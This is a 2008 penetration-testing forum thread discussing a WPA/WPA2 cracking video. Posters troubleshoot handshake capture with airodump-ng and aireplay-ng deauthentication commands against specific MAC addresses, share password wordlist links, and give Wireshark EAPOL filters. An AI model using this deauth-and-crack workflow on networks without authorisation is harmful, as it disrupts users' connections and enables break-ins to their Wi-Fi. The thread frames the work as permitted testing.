-=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

**-=Xploitz=-** · 01-14-2008, 01:04 AM

Originally Posted by coool

hello -=Xploitz=-

i'm test this tout on bt3 liveCD but i'cant get handshake and #Data is 0

look this

Code:

CH  1 ][ Elapsed:  mins ][ 2008-01-14 00:41

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:14:xx:xx:xx:xx   8  51     3816        0    0   1  48  WPA  TKIP   PSK  speedx

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:14:7F:83:8C:F1  00:0F:55:DD:FF:22   10   0- 1  3079    18698
 00:14:7F:83:8C:F1  00:0F:55:DD:FF:44   10   0- 1   532    25994
 00:14:7F:83:8C:F1  00:FF:BB:DD:FF:BB   11   0- 1  5194    19849
 00:14:7F:83:8C:F1  00:0F:B5:DD:FF:B4    8   0- 1  1078    20170

my method
1-
airodump-ng -c 1 -w psk --bssid 00:14:xx:xx:xx:xx ath0

2-
aireplay-ng -0 1600 -a 00:14:7F:83:8C:F1 -c 00:0F:55

D:FF:44 ath0
aireplay-ng -0 5 -a 00:14:7F:83:8C:F1 -c 00:0F:55

D:FF:44 ath0
aireplay-ng -0 1600 -a 00:14:7F:83:8C:F1 -c 00:0F:B5

D:FF:B4 ath0
aireplay-ng -0 1600 -a 00:14:7F:83:8C:F1 -c 00:FF:BB

D:FF:BB ath0
aireplay-ng -0 1600 -a 00:14:7F:83:8C:F1 -c 00:0F:55

D:FF:22 ath0

and update aircrack to 1.0-dev

and setup sqlite

the time 4 hours

and still this #DATA 0

can tell me what problem

Data means NOTHING with WPA/WPA 2

AS LONG AS YOU GET THE HANDSHAKE,...THATS ALL YOU NEED.

Deauth a client...and look in the upper right corner of your airodump screen. Does it say WPA Handshake like it does in my video??

REMEMBER WEP cracking and WPA/WPA2 cracking require 2 different methods. Data matters ONLY with WEP...not WPA/WPA2.

coool · 01-14-2008, 01:27 AM

you mean must be there other man on router

and after I can crack WPA?

but the network there one man and use the man use cable Ethernet just

any idea for this

and very sorry my English very bad

**-=Xploitz=-** · 01-14-2008, 01:35 AM

Originally Posted by coool

you mean must be there other man on router

and after I can crack WPA?

but the network there one man and use the man use cable Ethernet just

any idea for this

and very sorry my English very bad

Yes. THERE MUST BE A CLIENT CONNECTED TO CRACK WPA OR WPA2!!! NO EXCEPTIONS.

To make sure no client is connected (airodump doesn't ALWAYS "see" connected clients.....do a massive deauth to the AP

Code:

aireplay-ng -0 20 -a APMACADDRESS ath0

Also, you can ask him to not use Ethernet cable and to connect wirelessly only while your testing his network. Every client I have asked this question to has always said that they would because they want to help and because I had their permission to test their network.

**Stigmatic** · 01-18-2008, 08:08 AM

Great video, but does anyone know where to get a decent dictionary?

**balding_parrot** · 01-18-2008, 11:36 AM

Originally Posted by Stigmatic

Great video, but does anyone know where to get a decent dictionary?

do a search on the forum for wordlist

**imported_sardinemaster** · 02-12-2008, 07:40 PM

IN other words, being a nice guy, here is the links:

-=Xploitz Pirates'=- Masters Password Collection #1 and #2

Code:

http://forums.remote-exploit.org/showthread.php?t=11875

Pureh@tes Hatelist

Code:

http://forums.remote-exploit.org/showthread.php?t=11925

-=Xploitz=- Thread to share wordlist

Code:

http://forums.remote-exploit.org/showthread.php?t=7199

Peace

**-=Xploitz=-** · 02-12-2008, 07:55 PM

Originally Posted by sardinemaster

IN other words, being a nice guy, here is the link:

http://forums.remote-exploit.org/showthread.php?t=11875
Peace

I edited your link to show the first page of that thread, as well as added my thread to share wordlist and pureh@tes hatelist.

Hope you didn't mind.

**SparQz** · 02-13-2008, 02:54 PM

Ok again love your videos they are highly informational but airodump-ng is telling me that it got a WPA handshake but when i try to put the .cap file into cowpatty or aircrack-ng they both tell me that I didn't get one i checked my .cap file with wiresharek and it looks like i got it i don't quite understand what i'm looking for though...any help is appreciated

**samsung** · 02-15-2008, 04:28 PM

Originally Posted by SparQz

Ok again love your videos they are highly informational but airodump-ng is telling me that it got a WPA handshake but when i try to put the .cap file into cowpatty or aircrack-ng they both tell me that I didn't get one i checked my .cap file with wiresharek and it looks like i got it i don't quite understand what i'm looking for though...any help is appreciated

Can you post your outcome here so we can see what you are doing? You might not be entering all the exact commands correctly, but either way, it's always good to see it wrote down here so we can see what YOU see

**-=Xploitz=-** · 03-11-2008, 06:58 PM

Originally Posted by SparQz

Ok again love your videos they are highly informational but airodump-ng is telling me that it got a WPA handshake but when i try to put the .cap file into cowpatty or aircrack-ng they both tell me that I didn't get one i checked my .cap file with wiresharek and it looks like i got it i don't quite understand what i'm looking for though...any help is appreciated

Just a helpful wireshark filter hint....

to view only your EAPOL handshake(s) type this in the display filters

The filter for WPA2 is eapol.keydes.type == 2

and for WPA its eapol.keydes.type == 254

or just plain old...eapol
Type in the bolded text above EXACTLY spaces and all to get the filters working.This will quickly tell you if there are any handshakes or all 4 handshakes in the file.

BackTrack Linux - Penetration Testing Distribution

Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

Thread Tools

Search Thread

Display

i'm doing something wrong

Posting Permissions